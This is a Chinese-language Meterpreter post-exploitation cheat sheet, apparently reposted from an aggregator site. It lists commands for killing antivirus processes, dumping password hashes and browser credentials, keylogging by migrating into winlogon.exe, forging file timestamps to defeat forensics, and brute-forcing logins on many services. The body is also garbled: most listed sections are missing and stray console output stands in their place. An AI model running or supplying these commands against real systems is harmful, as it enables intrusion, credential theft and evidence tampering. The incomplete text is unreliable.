Metasploit中的Meterpreter模塊在后滲透階段具有強大的攻擊力，本文主要整理了meterpreter的常用命令、腳本及使用方式。包含信息收集、提權、注冊表操作、令牌操縱、哈希利用、后門植入等。

文章目錄

• • 0x01.系統命令
  • 0x02.文件系統命令
  • 0x03.網絡命令
  • 0x04.敏感信息收集
  • 0x05.@提權@
  • • 小插曲值UAC繞過
  • 0x06.mimikatz抓取密碼
  • 0x07.遠程桌面&截屏
  • 0x08.開啟rdp(遠程桌面)&添加用戶
  • 0x09.鍵盤記錄
  • 0x10.@sniffer抓包@
  • 0x11.注冊表操作
  • 0x12.盜取令牌
  • 0x13.哈希利用
  • @0x14.后門植入@
  • **關閉防火墻和殺軟**
  • 0x15.掃描腳本
  • 0X16.各種腳本
  • @綁定進程@
  • 基于MACE時間的反電子取證
  • 一些常用的破解模塊(就是各種..._login)
  • 一些好用的模塊

0x01.系統命令

1.基本系統命令

sessions #sessions -h 查看幫助 sessions -i <ID值> #進入回話 -k殺死會話 background #將當前會話至于后臺 run #執行已有模塊或腳本，輸入run后按兩下tab鍵，列出已有的腳本 info <...> #查看已有模塊信息 grtuid #查看權限 getpid #查看當前進程的pid sysinfo #查看目標機系統信息 ps #查看當前活躍進程 idletime #查看目標機閑置時間，顯示目標機器截止到當前無操作命令的時間 reboot/shutdown #重啟/關機 shell #進入目標機cmd shell（如果出錯，考慮是目標主機限制了cmd.exe的訪問權,可以使用migrate注入到管理員用戶進程中再嘗試） load/use #加載模塊

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[] Killing Antivirus services on the target...
[] Killing off sh.exe...
[*] Killing off sh.exe...

0x15.掃描腳本

掃描的腳本位于：

/usr/share/metasploit-framework/modules/auxiliary/scanner/

掃描的腳本較多，僅列幾個代表：

use auxiliary/scanner/http/dir_scanner use auxiliary/scanner/http/jboss_vulnscan use auxiliary/scanner/mssql/mssql_login use auxiliary/scanner/mysql/mysql_version use auxiliary/scanner/oracle/oracle_login

0X16.各種腳本

為獲取遠程機器上的信息，在meterpreter中還有很多腳本可用，做更大的滲透測試。

使用run <scriptname>來使用meterpreter模塊中的腳本命令。

(1) run packetrecorder

查看目標系統的所有網絡流量，并且進行數據包記錄，-i 1指定記錄數據包的網卡。

從下圖中運行之后返回的信息中可以到我們需要查看的目標系統的網絡流量信息將被存儲的路徑，可以到下面路徑中直接查看。

(2) run get_local_subnets

得到本地子網網段

(3) run getcountermeasure

顯示HIPS和AV進程的列表，顯示遠程機器的防火墻規則，列出DEP和UAC策略

(4) run scraper

從目標主機獲得所有網絡共享等信息(密碼等)。

并且獲得的這些所有這些信息都存儲在/root/.msf4/logs/scripts/scraper directory目錄下。使用ls命令查看存儲的這些文件。

(5)run killav

命令終止Av進程，可以很快的清除我們的路徑和有效滲透測試的記錄

但是這個腳本,不能絕對得逃避殺毒軟件，但是如果成功了對被攻擊者會是一個嚴重的打擊，對他造成很大的困擾。

使用了 “run killav”命令后xp會終止Av進程然后彈出窗口：

(6) run hashdump

獲得密碼哈希值

運行這個腳本和在meterpreter下直接運行hashdump結果差不多。

(7) run dumplinks

Link文件包含時間戳，文件位置，共享名，卷序列號，等。腳本會在用戶目錄和office目錄中收集lnk文件

調用post/windows/gather/dumplinks獲取目標主機上最近訪問過的文檔、鏈接信息

命令：run post/windows/gather/dumplinks

效果如下圖：

(8) duplicate

再次產生payload，注入到其他進程或打開新進程并注入其中

(9) run enum_chrome

獲取chrome中的信息，包括cooikie，歷史紀錄，書簽,登錄密碼等。同理：enum_firefox

(10) run get_env

獲取所有用戶的環境變量

(11) run getgui

可以很方便的開啟遠程桌面服務，添加用戶，端口轉發功能

(12) run gettelnet

同之前開啟終端桌面服務的腳本，這個是用來開啟telnet的

(13)run hostsedit

操作hosts文件

(14)run win32-sshserver

安裝openssh服務

(15) run winenum

會自動運行多種命令，將命令結果保存到本地

@綁定進程@

Meterpreter既可以單獨運行，也可以與其他進程進行綁定。因此，我們可以讓Meterpreter與類似explorer.exe這樣的進程進行綁定，并以此來實現持久化。

在下面的例子中，我們會將Meterpreter跟winlogon.exe綁定，并在登錄進程中捕獲鍵盤記錄。

首先，我們需要使用“ps”命令查看目標設備中運行的進程：

接下來，使用“getpid”找出需要綁定的進程，接下來，使用migrate命令+pid來綁定進程。

綁定完成之后，我們就可以開始捕獲鍵盤數據了：

接下來，我們可以選擇導出鍵盤記錄，或者使用命令“enum_logged_on_users”來檢查用戶是否成功登錄：

等待片刻之后，使用keyscan_dump命令導出記錄信息:

捕捉到的用戶密碼為trustno1。

基于MACE時間的反電子取證

**小插曲：**文件四屬性（MACE）

只要有人訪問文件并讀取其內容。文件的MACE屬性立即發生變化！這對取證非常的有好處。

MACE 是：Modified-Accessed-Created-Entry 這四個單詞的縮寫！

Modified：修改時間

Accessed：訪問時間

Created：創建時間

Entry Modified： 條目修改時間

timestomp -v secist.txt #查看當前目標文件 MACE 時間。

timestomp c:/a.doc -c “10/27/2015 14:22:11” #修改文件的創建時間，例如修改文件的創建時間（反取證調查）

timestomp -f c:\AVScanner.ini secist.txt （將模板文件MACE時間，復制給當前secist.txt文件）

之后就是愉快的內網掃描了!haha!

一些常用的破解模塊(就是各種…_login)

auxiliary/scanner/mssql/mssql_login auxiliary/scanner/ftp/ftp_login auxiliary/scanner/ssh/ssh_login auxiliary/scanner/telnet/telnet_login auxiliary/scanner/smb/smb_login auxiliary/scanner/mssql/mssql_login auxiliary/scanner/mysql/mysql_login auxiliary/scanner/oracle/oracle_login auxiliary/scanner/postgres/postgres_login auxiliary/scanner/vnc/vnc_login auxiliary/scanner/pcanywhere/pcanywhere_login auxiliary/scanner/snmp/snmp_login auxiliary/scanner/ftp/anonymous

• 13

一些好用的模塊

auxiliary/admin/realvnc_41_bypass (Bypass VNCV4網上也有利用工具) auxiliary/admin/cisco/cisco_secure_acs_bypass （cisco Bypass 版本5.1或者未打補丁5.2版洞略老） auxiliary/admin/http/jboss_deploymentfilerepository （內網遇到Jboss最愛:)） auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令執行:) auxiliary/admin/mssql/mssql_exec （用爆破得到的sa弱口令進行執行命令沒回顯:(） auxiliary/scanner/http/jboss_vulnscan (Jboss 內網滲透的好朋友) auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令執行sql語句:) auxiliary/admin/oracle/post_exploitation/win32exec （爆破得到Oracle弱口令來Win32命令執行） auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用戶來執行sql語句) auxiliary/scanner/rsync/modules_list （Rsync） auxiliary/scanner/misc/redis_server (Redis) auxiliary/scanner/ssl/openssl_heartbleed (心臟滴血) auxiliary/scanner/mongodb/mongodb_login (Mongodb) auxiliary/scanner/elasticsearch/indices_enum (elasticsearch) auxiliary/scanner/http/axis_local_file_include (axis本地文件包含) auxiliary/scanner/http/http_put (http Put) auxiliary/scanner/http/gitlab_user_enum (獲取內網gitlab用戶) auxiliary/scanner/http/jenkins_enum (獲取內網jenkins用戶) auxiliary/scanner/http/svn_scanner （svn Hunter :)） auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破) auxiliary/scanner/http/zabbix_login （Zabbix :)）

本節所涉及的windows系統程序：

• svchost.exe是微軟Windows操作系統中的系統文件，微軟官方對它的解釋是：svchost.exe 是從動態鏈接庫 (DLL) 中運行的服務的通用主機進程名稱。這個程序對系統的正常運行是非常重要，而且是不能被結束的。許多服務通過注入到該程序中啟動，所以會有多個該文件的進程。
• explorer.exe是Windows程序管理器或者文件資源管理器，它用于管理Windows圖形殼，包括桌面和文件管理，刪除該程序會導致Windows圖形界面無法使用。explorer.exe也有可能是w32.Codered等病毒。該病毒通過email郵件傳播，當打開病毒發送的附件時，即被感染，會在受害者機器上建立SMTP服務，允許攻擊者訪問你的計算機、竊取密碼和個人數據。
• winlogon.exe是Windows NT 用戶登陸程序，用于管理用戶登錄和退出。該進程的正常路徑應是C:\Windows\System32，且是以 SYSTEM 用戶運行，若不是以上路徑且不以 SYSTEM 用戶運行，則可能是 W32.Netsky.D@mm 蠕蟲病毒，該病毒通過 EMail 郵件傳播，當你打開病毒發送的附件時，即會被感染。

總結

以上是生活随笔為你收集整理的Meterpreter重要命令与使用的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。